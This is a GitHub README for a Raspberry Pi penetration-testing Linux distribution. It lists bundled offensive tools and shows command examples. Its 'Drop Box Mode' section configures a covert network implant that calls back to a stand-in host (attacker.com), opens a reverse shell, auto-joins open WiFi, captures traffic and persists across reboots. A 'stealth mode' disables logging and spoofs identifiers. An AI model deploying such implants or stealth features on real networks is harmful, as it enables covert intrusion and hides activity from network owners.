Skip to content

πŸ₯§ NullSec Linux Pi Edition - Security-focused Linux for Raspberry Pi with ARM-optimized pentesting tools

License

Notifications You must be signed in to change notification settings

bad-antics/nullsec-linux-pi

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

1 Commit
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ₯§ NullSec Linux Pi Edition

Version Platform License

Security-focused Linux distribution optimized for Raspberry Pi

Portable penetration testing β€’ IoT security β€’ Embedded hacking β€’ Field operations

Features β€’ Download β€’ Installation β€’ Tools β€’ Documentation


🎯 Overview

NullSec Linux Pi Edition is a specialized security distribution designed for Raspberry Pi hardware. It transforms your Pi into a powerful, portable penetration testing platform with optimized ARM tools, GPIO security utilities, and field-ready capabilities.

✨ Features

Feature Description
πŸ”§ ARM-Optimized Tools 80+ security tools compiled for ARM64/ARMv7
πŸ“‘ WiFi Attacks Monitor mode drivers, aircrack-ng suite, WiFi Pineapple integration
πŸ”Œ GPIO Security Hardware hacking tools, JTAG/SWD debugging, signal analysis
🎭 Stealth Mode MAC spoofing, traffic obfuscation, covert channels
πŸ“± Mobile Integration Android/iOS testing, Bluetooth attacks, NFC tools
πŸ”‹ Power Optimized Battery-friendly profiles, headless operation
πŸ–₯️ Multiple Modes Desktop, headless server, kiosk, drop box

��️ Supported Hardware

Device Status Notes
Raspberry Pi 5 βœ… Full Support Recommended
Raspberry Pi 4B βœ… Full Support 4GB+ RAM recommended
Raspberry Pi 400 βœ… Full Support Built-in keyboard
Raspberry Pi 3B+ ⚠️ Limited Reduced toolset
Raspberry Pi Zero 2W ⚠️ Limited Headless only

πŸ“¦ Editions

πŸ”₯ Full Edition (~4GB)

Complete security toolkit with GUI, all tools, and development environment.

⚑ Lite Edition (~2GB)

Headless operation with essential tools for field deployment.

🎯 Drop Box Edition (~1.5GB)

Minimal footprint for covert network implants with auto-callback.

πŸ› οΈ Pre-installed Tools

🌐 Network Security (25+ tools)
  • Nmap, Masscan, Netcat
  • Aircrack-ng suite
  • Bettercap, Responder
  • Wireshark (GUI), tshark
  • WiFite2, Wifiphisher
  • Kismet, hostapd-wpe
πŸ”“ Exploitation (20+ tools)
  • Metasploit Framework
  • SQLMap, Commix
  • Hydra, Medusa
  • CrackMapExec
  • Impacket suite
  • Covenant (C2)
πŸ”Œ Hardware Hacking (15+ tools)
  • OpenOCD (JTAG/SWD)
  • flashrom
  • SigRok/PulseView
  • can-utils (CAN bus)
  • I2C/SPI tools
  • GPIO manipulation
πŸ“» RF & Wireless (15+ tools)
  • GNU Radio
  • RTL-SDR tools
  • HackRF utilities
  • Bluetooth tools (Ubertooth)
  • NFC tools (libnfc)
  • LoRa analysis

πŸš€ Quick Start

Flash to SD Card

# Download image
wget https://github.com/bad-antics/nullsec-linux-pi/releases/latest/download/nullsec-pi-full.img.xz

# Flash (Linux/macOS)
xzcat nullsec-pi-full.img.xz | sudo dd of=/dev/sdX bs=4M status=progress

# Or use Raspberry Pi Imager with custom image

First Boot

# Default credentials
Username: nullsec
Password: nullsec

# Change password immediately
passwd

# Update tools
sudo nullsec-update

🎭 Stealth Features

# Enable full stealth mode
sudo nullsec-stealth enable

# Includes:
# - MAC address randomization
# - Hostname spoofing
# - Traffic obfuscation
# - Logging disabled
# - Memory-only operation

# Disable stealth
sudo nullsec-stealth disable

πŸ“‘ Drop Box Mode

Deploy as a covert network implant:

# Configure callback
sudo nullsec-dropbox config \
  --callback-host attacker.com \
  --callback-port 443 \
  --interval 300 \
  --protocol https

# Enable drop box mode
sudo nullsec-dropbox enable

# Device will:
# - Auto-connect to any open WiFi
# - Establish reverse shell
# - Capture network traffic
# - Persist across reboots

πŸ”§ GPIO Security Tools

# JTAG scanning
sudo nullsec-jtag scan

# SWD debugging
sudo nullsec-swd connect --target stm32

# I2C enumeration
sudo nullsec-i2c scan

# SPI flash dump
sudo nullsec-spi dump --output firmware.bin

πŸ“Š System Requirements

Edition Storage RAM Network
Full 16GB+ 4GB+ WiFi + Ethernet
Lite 8GB+ 2GB+ WiFi
Drop Box 4GB+ 1GB+ WiFi

πŸ”— Related Projects


bad-antics β€’ For authorized security testing only

About

πŸ₯§ NullSec Linux Pi Edition - Security-focused Linux for Raspberry Pi with ARM-optimized pentesting tools

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages